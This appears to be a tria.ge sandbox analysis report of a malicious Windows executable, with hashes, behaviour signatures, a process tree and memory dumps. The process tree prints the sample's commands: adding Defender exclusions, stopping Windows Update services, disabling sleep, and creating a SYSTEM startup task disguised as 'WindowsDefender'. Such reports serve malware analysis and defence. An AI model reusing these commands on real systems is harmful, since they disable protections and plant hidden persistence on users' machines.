Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    39s
  • max time network
    80s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/08/2023, 04:36

General

  • Target

    5fc29cdd01e0bb02ab69904ac0156b41ed6e9b9e1130a761fe44e03b9d51f8f3.exe

  • Size

    5.7MB

  • MD5

    98775ff23cbc45e7ad6c81974270d4cc

  • SHA1

    3de0012444ba5050863b7d5ba164d680d04a1539

  • SHA256

    5fc29cdd01e0bb02ab69904ac0156b41ed6e9b9e1130a761fe44e03b9d51f8f3

  • SHA512

    eb3f59dd4780fe77a3e3f5560f7d7389a80441412cd192e3ed0e30c02bb25559caa59b2c08035283499f6eb74353a1f31a123066e09a967adfeeb112af5f327c

  • SSDEEP

    98304:S0TVWEzKhoqXr+bTk0OUNAhqFabD/JpYPAKUwHbJBjL+nzEHiKUrvVrOIgB:Spr+vk0OgAheafDYPAKUSbEP

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Stops running service(s) 3 TTPs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3168
      • C:\Users\Admin\AppData\Local\Temp\5fc29cdd01e0bb02ab69904ac0156b41ed6e9b9e1130a761fe44e03b9d51f8f3.exe
        "C:\Users\Admin\AppData\Local\Temp\5fc29cdd01e0bb02ab69904ac0156b41ed6e9b9e1130a761fe44e03b9d51f8f3.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:2128
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4568
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4272
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:1124
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:1548
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:3420
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:372
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:3104
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
          PID:1508
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            3⤵
              PID:4176
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              3⤵
                PID:2944
              • C:\Windows\System32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                3⤵
                  PID:456
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-dc 0
                  3⤵
                    PID:1288
                • C:\Windows\System32\dialer.exe
                  C:\Windows\System32\dialer.exe
                  2⤵
                    PID:4784
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wakic#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefender' /tr '''C:\Program Files\WindowsDefender.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefender.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefender' -User 'System' -RunLevel 'Highest' -Force; }
                    2⤵
                      PID:3992
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -pss -s 476 -p 608 -ip 608
                    1⤵
                      PID:2080
                    • C:\Windows\system32\WerFault.exe
                      C:\Windows\system32\WerFault.exe -pss -s 496 -p 668 -ip 668
                      1⤵
                        PID:1928
                      • C:\Windows\system32\WerFault.exe
                        C:\Windows\system32\WerFault.exe -u -p 608 -s 616
                        1⤵
                        • Program crash
                        PID:4136
                      • C:\Windows\system32\WerFault.exe
                        C:\Windows\system32\WerFault.exe -u -p 668 -s 2256
                        1⤵
                        • Program crash
                        PID:4992
                      • C:\Windows\system32\sihost.exe
                        sihost.exe
                        1⤵
                          PID:3700
                        • C:\Windows\system32\sihost.exe
                          sihost.exe
                          1⤵
                            PID:1444

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                            Filesize

                            2KB

                            MD5

                            d85ba6ff808d9e5444a4b369f5bc2730

                            SHA1

                            31aa9d96590fff6981b315e0b391b575e4c0804a

                            SHA256

                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                            SHA512

                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            944B

                            MD5

                            cadef9abd087803c630df65264a6c81c

                            SHA1

                            babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                            SHA256

                            cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                            SHA512

                            7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mwf0rrtd.j2w.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • memory/336-50-0x00007FFBE7B70000-0x00007FFBE7B80000-memory.dmp

                            Filesize

                            64KB

                          • memory/336-60-0x00000210896C0000-0x00000210896E7000-memory.dmp

                            Filesize

                            156KB

                          • memory/336-46-0x00000210896C0000-0x00000210896E7000-memory.dmp

                            Filesize

                            156KB

                          • memory/396-54-0x000001CCA5140000-0x000001CCA5167000-memory.dmp

                            Filesize

                            156KB

                          • memory/396-56-0x00007FFBE7B70000-0x00007FFBE7B80000-memory.dmp

                            Filesize

                            64KB

                          • memory/396-62-0x000001CCA5140000-0x000001CCA5167000-memory.dmp

                            Filesize

                            156KB

                          • memory/608-48-0x00007FFC27B8D000-0x00007FFC27B8E000-memory.dmp

                            Filesize

                            4KB

                          • memory/608-131-0x00000200185C0000-0x00000200185E7000-memory.dmp

                            Filesize

                            156KB

                          • memory/608-43-0x00000200185C0000-0x00000200185E7000-memory.dmp

                            Filesize

                            156KB

                          • memory/608-35-0x0000020018590000-0x00000200185B1000-memory.dmp

                            Filesize

                            132KB

                          • memory/608-37-0x00000200185C0000-0x00000200185E7000-memory.dmp

                            Filesize

                            156KB

                          • memory/668-51-0x000002488F530000-0x000002488F557000-memory.dmp

                            Filesize

                            156KB

                          • memory/668-57-0x00007FFC27B8F000-0x00007FFC27B90000-memory.dmp

                            Filesize

                            4KB

                          • memory/668-41-0x00007FFBE7B70000-0x00007FFBE7B80000-memory.dmp

                            Filesize

                            64KB

                          • memory/668-55-0x00007FFC27B8D000-0x00007FFC27B8E000-memory.dmp

                            Filesize

                            4KB

                          • memory/668-40-0x000002488F530000-0x000002488F557000-memory.dmp

                            Filesize

                            156KB

                          • memory/680-67-0x000002247B4F0000-0x000002247B517000-memory.dmp

                            Filesize

                            156KB

                          • memory/680-70-0x00007FFBE7B70000-0x00007FFBE7B80000-memory.dmp

                            Filesize

                            64KB

                          • memory/680-96-0x000002247B4F0000-0x000002247B517000-memory.dmp

                            Filesize

                            156KB

                          • memory/952-49-0x00007FFBE7B70000-0x00007FFBE7B80000-memory.dmp

                            Filesize

                            64KB

                          • memory/952-61-0x00007FFC27B8C000-0x00007FFC27B8D000-memory.dmp

                            Filesize

                            4KB

                          • memory/952-59-0x0000012F00510000-0x0000012F00537000-memory.dmp

                            Filesize

                            156KB

                          • memory/952-45-0x0000012F00510000-0x0000012F00537000-memory.dmp

                            Filesize

                            156KB

                          • memory/1040-102-0x0000026B8D4A0000-0x0000026B8D4C7000-memory.dmp

                            Filesize

                            156KB

                          • memory/1040-68-0x0000026B8D4A0000-0x0000026B8D4C7000-memory.dmp

                            Filesize

                            156KB

                          • memory/1040-71-0x00007FFBE7B70000-0x00007FFBE7B80000-memory.dmp

                            Filesize

                            64KB

                          • memory/1060-76-0x00007FFBE7B70000-0x00007FFBE7B80000-memory.dmp

                            Filesize

                            64KB

                          • memory/1060-74-0x000001E9802D0000-0x000001E9802F7000-memory.dmp

                            Filesize

                            156KB

                          • memory/1060-142-0x000001E9802D0000-0x000001E9802F7000-memory.dmp

                            Filesize

                            156KB

                          • memory/1136-78-0x000001747C8B0000-0x000001747C8D7000-memory.dmp

                            Filesize

                            156KB

                          • memory/1136-80-0x00007FFBE7B70000-0x00007FFBE7B80000-memory.dmp

                            Filesize

                            64KB

                          • memory/1136-147-0x000001747C8B0000-0x000001747C8D7000-memory.dmp

                            Filesize

                            156KB

                          • memory/1200-89-0x000001A386E60000-0x000001A386E87000-memory.dmp

                            Filesize

                            156KB

                          • memory/1200-90-0x00007FFBE7B70000-0x00007FFBE7B80000-memory.dmp

                            Filesize

                            64KB

                          • memory/1216-95-0x00007FFBE7B70000-0x00007FFBE7B80000-memory.dmp

                            Filesize

                            64KB

                          • memory/1216-94-0x000002AE37980000-0x000002AE379A7000-memory.dmp

                            Filesize

                            156KB

                          • memory/1232-104-0x00007FFBE7B70000-0x00007FFBE7B80000-memory.dmp

                            Filesize

                            64KB

                          • memory/1232-106-0x0000024200D90000-0x0000024200DB7000-memory.dmp

                            Filesize

                            156KB

                          • memory/1232-100-0x0000024200D90000-0x0000024200DB7000-memory.dmp

                            Filesize

                            156KB

                          • memory/1352-112-0x00000260BC760000-0x00000260BC787000-memory.dmp

                            Filesize

                            156KB

                          • memory/1352-105-0x00000260BC760000-0x00000260BC787000-memory.dmp

                            Filesize

                            156KB

                          • memory/1352-110-0x00007FFBE7B70000-0x00007FFBE7B80000-memory.dmp

                            Filesize

                            64KB

                          • memory/1380-113-0x00007FFBE7B70000-0x00007FFBE7B80000-memory.dmp

                            Filesize

                            64KB

                          • memory/1380-109-0x0000025026670000-0x0000025026697000-memory.dmp

                            Filesize

                            156KB

                          • memory/1380-143-0x0000025026670000-0x0000025026697000-memory.dmp

                            Filesize

                            156KB

                          • memory/1392-116-0x0000015370DB0000-0x0000015370DD7000-memory.dmp

                            Filesize

                            156KB

                          • memory/1392-115-0x00007FFBE7B70000-0x00007FFBE7B80000-memory.dmp

                            Filesize

                            64KB

                          • memory/1392-111-0x0000015370DB0000-0x0000015370DD7000-memory.dmp

                            Filesize

                            156KB

                          • memory/1464-125-0x000001FE51AF0000-0x000001FE51B17000-memory.dmp

                            Filesize

                            156KB

                          • memory/1464-117-0x000001FE51AF0000-0x000001FE51B17000-memory.dmp

                            Filesize

                            156KB

                          • memory/1476-138-0x000002AD9ED10000-0x000002AD9ED37000-memory.dmp

                            Filesize

                            156KB

                          • memory/1584-140-0x00000222DE160000-0x00000222DE187000-memory.dmp

                            Filesize

                            156KB

                          • memory/1628-162-0x000001ACDC170000-0x000001ACDC197000-memory.dmp

                            Filesize

                            156KB

                          • memory/1724-171-0x0000028346DB0000-0x0000028346DD7000-memory.dmp

                            Filesize

                            156KB

                          • memory/1748-175-0x00000226787A0000-0x00000226787C7000-memory.dmp

                            Filesize

                            156KB

                          • memory/1900-185-0x000002D618E60000-0x000002D618E87000-memory.dmp

                            Filesize

                            156KB

                          • memory/2128-38-0x00007FF668410000-0x00007FF6689D7000-memory.dmp

                            Filesize

                            5.8MB

                          • memory/3700-151-0x0000024A422D0000-0x0000024A422F7000-memory.dmp

                            Filesize

                            156KB

                          • memory/3700-156-0x00007FFC27AF0000-0x00007FFC27CE5000-memory.dmp

                            Filesize

                            2.0MB

                          • memory/3992-82-0x00007FFC098E0000-0x00007FFC0A3A1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3992-32-0x00000174340F0000-0x0000017434100000-memory.dmp

                            Filesize

                            64KB

                          • memory/3992-21-0x00007FFC098E0000-0x00007FFC0A3A1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3992-84-0x00000174340F0000-0x0000017434100000-memory.dmp

                            Filesize

                            64KB

                          • memory/3992-86-0x00000174340F0000-0x0000017434100000-memory.dmp

                            Filesize

                            64KB

                          • memory/3992-91-0x00000174340F0000-0x0000017434100000-memory.dmp

                            Filesize

                            64KB

                          • memory/3992-34-0x00000174340F0000-0x0000017434100000-memory.dmp

                            Filesize

                            64KB

                          • memory/3992-28-0x00000174340F0000-0x0000017434100000-memory.dmp

                            Filesize

                            64KB

                          • memory/4568-13-0x000001AEB50C0000-0x000001AEB50D0000-memory.dmp

                            Filesize

                            64KB

                          • memory/4568-12-0x000001AEB50C0000-0x000001AEB50D0000-memory.dmp

                            Filesize

                            64KB

                          • memory/4568-10-0x00007FFC098E0000-0x00007FFC0A3A1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/4568-11-0x000001AEB50C0000-0x000001AEB50D0000-memory.dmp

                            Filesize

                            64KB

                          • memory/4568-0-0x000001AECF6C0000-0x000001AECF6E2000-memory.dmp

                            Filesize

                            136KB

                          • memory/4568-16-0x00007FFC098E0000-0x00007FFC0A3A1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/4784-18-0x00007FFC27AF0000-0x00007FFC27CE5000-memory.dmp

                            Filesize

                            2.0MB

                          • memory/4784-19-0x00007FFC25D70000-0x00007FFC25E2E000-memory.dmp

                            Filesize

                            760KB

                          • memory/4784-83-0x00007FF7FF6E0000-0x00007FF7FF709000-memory.dmp

                            Filesize

                            164KB